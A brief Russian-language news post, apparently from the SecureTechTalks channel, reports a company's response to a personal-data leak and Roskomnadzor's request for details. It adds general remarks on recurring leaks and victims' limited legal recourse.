Компания усилила мониторинг и защиту точек доступа к личной информации. Роскомнадзор также запросил дополнительные сведения о произошедшем инциденте.
📈 Что нужно знать:
- Утечки данных становятся регулярной проблемой, что требует усиленного контроля за безопасностью.
- Пострадавшие пользователи имеют право требовать компенсации, однако судебная практика в этой сфере пока ограничена.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #утечкаданных #SecureTechTalks
#почта #dataleak